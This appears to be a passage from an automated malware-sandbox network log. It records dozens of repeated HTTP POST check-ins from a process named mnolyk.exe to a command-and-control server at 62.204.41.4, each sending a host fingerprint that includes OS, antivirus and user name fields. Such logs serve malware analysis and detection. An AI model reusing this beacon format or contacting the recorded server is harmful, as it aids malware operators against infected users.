Timestamp                           kBytes transferred  Direction  Data
Feb 6, 2023 18:38:00.687932014 CET  912                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
Feb 6, 2023 18:38:00.751907110 CET  912                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
453         192.168.2.7  50181        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp                           kBytes transferred  Direction  Data
Feb 6, 2023 18:38:00.930274963 CET  913                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
Feb 6, 2023 18:38:00.995223045 CET  913                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
454         192.168.2.7  50182        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp                           kBytes transferred  Direction  Data
Feb 6, 2023 18:38:01.180151939 CET  914                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
Feb 6, 2023 18:38:01.245896101 CET  914                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      455 | 192.168.2.7 | 50183 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:01.423474073 CET | 915 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:01.488751888 CET | 915 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      456 | 192.168.2.7 | 50184 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:01.659964085 CET | 916 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:01.723052025 CET | 916 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      457 | 192.168.2.7 | 50185 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:01.897078991 CET | 917 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:01.960419893 CET | 917 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      458 | 192.168.2.7 | 50186 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:02.145296097 CET | 918 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:02.211823940 CET | 918 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      459 | 192.168.2.7 | 50187 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:02.390913010 CET | 919 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:02.453962088 CET | 919 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      46 | 192.168.2.7 | 49770 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:08.800627947 CET | 478 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:08.866245985 CET | 478 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      460 | 192.168.2.7 | 50188 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:02.626277924 CET | 920 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:02.690078020 CET | 920 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      461 | 192.168.2.7 | 50189 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:02.860152006 CET | 921 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:02.926038027 CET | 921 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      462 | 192.168.2.7 | 50190 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:03.117137909 CET | 922 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:03.186362982 CET | 922 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      463 | 192.168.2.7 | 50191 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:03.374136925 CET | 923 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:03.439101934 CET | 923 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      464 | 192.168.2.7 | 50192 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:03.610611916 CET | 924 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:03.675545931 CET | 924 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      465 | 192.168.2.7 | 50193 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:03.846257925 CET | 925 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:03.912359953 CET | 925 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      466 | 192.168.2.7 | 50194 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:04.099905968 CET | 926 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:04.165308952 CET | 926 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      467 | 192.168.2.7 | 50195 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:04.351511002 CET | 927 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:04.417937040 CET  927                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      468         192.168.2.7  50196        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:04.592802048 CET  928                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:04.661218882 CET  928                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      469         192.168.2.7  50197        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:04.844993114 CET  929                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:04.909439087 CET  929                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
